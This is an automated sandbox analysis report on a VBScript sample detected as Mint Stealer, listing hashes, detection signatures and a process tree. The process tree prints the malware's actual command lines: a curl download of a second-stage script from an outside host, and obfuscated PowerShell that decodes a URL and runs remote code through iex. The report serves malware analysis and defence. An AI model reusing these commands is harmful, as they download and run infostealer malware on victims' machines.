Edit tour
Windows
Analysis Report
676556be12ac3.vbs
Overview
General Information
| Sample name: | 676556be12ac3.vbs |
| Analysis ID: | 1578783 |
| MD5: | 288168092dc1116083d7dea05fb97946 |
| SHA1: | 61d44c8f0d2ee68f6350f921f442c91ddad03f8d |
| SHA256: | 9103d31fceae9c886164ed174ab66282406779964543edaeae14a89ddc6b2821 |
| Tags: | vbsuser-cdcd |
| Infos: |   |
 | |
Detection
Mint Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Mint Stealer
AI detected suspicious sample
Creates processes via WMI
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
wscript.exe (PID: 7464 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\67655 6be12ac3.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 7516 cmdline: "C:\Window s\System32 \cmd.exe" /V/D/c cur l -k -o C: \Users\Pub lic\676556 be12aca.vb s https:// file-downl oad.bytez. cloud/6765 56be12355/ 676556be12 aca.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7524 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
curl.exe (PID: 7564 cmdline: curl -k -o C:\Users\ Public\676 556be12aca .vbs https ://file-do wnload.byt ez.cloud/6 76556be123 55/676556b e12aca.vbs MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - cmd.exe (PID: 7636 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 76556be12a ca.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7644 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 7704 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \676556be1 2aca.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - wscript.exe (PID: 7900 cmdline:
"C:\Window s\System32 \wscript.e xe" //E:js cript C:\U sers\user\ AppData\Lo cal\Temp\y kgnts.js MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7732 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 76556be12a ca.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7740 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 7828 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \676556be1 2aca.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - wscript.exe (PID: 7932 cmdline:
"C:\Window s\System32 \wscript.e xe" //E:js cript C:\U sers\user\ AppData\Lo cal\Temp\j fwdec.js MD5: A47CBE969EA935BDD3AB568BB126BC80) - conhost.exe (PID: 8012 cmdline:
conhost -- headless p owershell $vgefcqxzr t='ur' ;ne w-alias pr intout c$( $vgefcqxzr t)l;$hfcvp ezag=(1834 ,1845,1853 ,1837,1839 ,1834,1854 ,1853,1858 ,1791,1853 ,1787,1834 ,1782,1852 ,1847,1848 ,1783,1785 ,1782,1848 ,1840,1848 ,1799,1851 ,1797,1845 ,1841,1846 ,1852,1851 ,1786,1785 );$tojrkpg bsvmcq=('b ronx','get -cmdlet'); $lspvtzafd qnegy=$hfc vpezag;for each($bzgu mhk in $ls pvtzafdqne gy){$ontzi d=$bzgumhk ;$wzyatgcp jiv=$wzyat gcpjiv+[ch ar]($ontzi d-1736);$h mgrcuitvfb =$wzyatgcp jiv; $quvr zaxtinbgm= $hmgrcuitv fb};$mzxnd fjebgh[2]= $quvrzaxti nbgm;$edso gfiw='rl'; $hqukojaxy i=1;.$([ch ar](9992-9 887)+'e'+' x')(printo ut -useb $ quvrzaxtin bgm) MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 8032 cmdline: powershell $vgefcqxz rt='ur' ;n ew-alias p rintout c$ ($vgefcqxz rt)l;$hfcv pezag=(183 4,1845,185 3,1837,183 9,1834,185 4,1853,185 8,1791,185 3,1787,183 4,1782,185 2,1847,184 8,1783,178 5,1782,184 8,1840,184 8,1799,185 1,1797,184 5,1841,184 6,1852,185 1,1786,178 5);$tojrkp gbsvmcq=(' bronx','ge t-cmdlet') ;$lspvtzaf dqnegy=$hf cvpezag;fo reach($bzg umhk in $l spvtzafdqn egy){$ontz id=$bzgumh k;$wzyatgc pjiv=$wzya tgcpjiv+[c har]($ontz id-1736);$ hmgrcuitvf b=$wzyatgc pjiv; $quv rzaxtinbgm =$hmgrcuit vfb};$mzxn dfjebgh[2] =$quvrzaxt inbgm;$eds ogfiw='rl' ;$hqukojax yi=1;.$([c har](9992- 9887)+'e'+ 'x')(print out -useb $quvrzaxti nbgm) MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8080 cmdline:
conhost -- headless p owershell $bajznwdxf qyht='ur' ;new-alias printout c$($bajznw dxfqyht)l; $gqcbnpkvt wdlr=(5904 ,5915,5923 ,5907,5909 ,5904,5924 ,5923,5928 ,5861,5923 ,5857,5904 ,5852,5922 ,5917,5918 ,5853,5855 ,5852,5918 ,5910,5918 ,5869,5921 ,5867,5915 ,5911,5916 ,5922,5921 ,5856,5855 );$otrdenu =('bronx', 'get-cmdle t');$ykcsf p=$gqcbnpk vtwdlr;for each($qmot vzbud in $ ykcsfp){$g bmykl=$qmo tvzbud;$cl snkw=$clsn kw+[char]( $gbmykl-58 06);$gsqzf klidcjt=$c lsnkw; $xe dctq=$gsqz fklidcjt}; $ifebnlk[2 ]=$xedctq; $hnafgyt=' rl';$jrmst yaoedk=1;. $([char](9 992-9887)+ 'e'+'x')(p rintout -u seb $xedct q) MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8100 cmdline:
powershell $bajznwdx fqyht='ur' ;new-alia s printout c$($bajzn wdxfqyht)l ;$gqcbnpkv twdlr=(590 4,5915,592 3,5907,590 9,5904,592 4,5923,592 8,5861,592 3,5857,590 4,5852,592 2,5917,591 8,5853,585 5,5852,591 8,5910,591 8,5869,592 1,5867,591 5,5911,591 6,5922,592 1,5856,585 5);$otrden u=('bronx' ,'get-cmdl et');$ykcs fp=$gqcbnp kvtwdlr;fo reach($qmo tvzbud in $ykcsfp){$ gbmykl=$qm otvzbud;$c lsnkw=$cls nkw+[char] ($gbmykl-5 806);$gsqz fklidcjt=$ clsnkw; $x edctq=$gsq zfklidcjt} ;$ifebnlk[ 2]=$xedctq ;$hnafgyt= 'rl';$jrms tyaoedk=1; .$([char]( 9992-9887) +'e'+'x')( printout - useb $xedc tq) MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | ||
| JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | ||
| JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
System Summary |   |
|---|
| Source: | Author: frack113, Florian Roth: | ||
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: Tim Shelton: | ||
| Source: | Author: frack113: | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Michael Haag: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||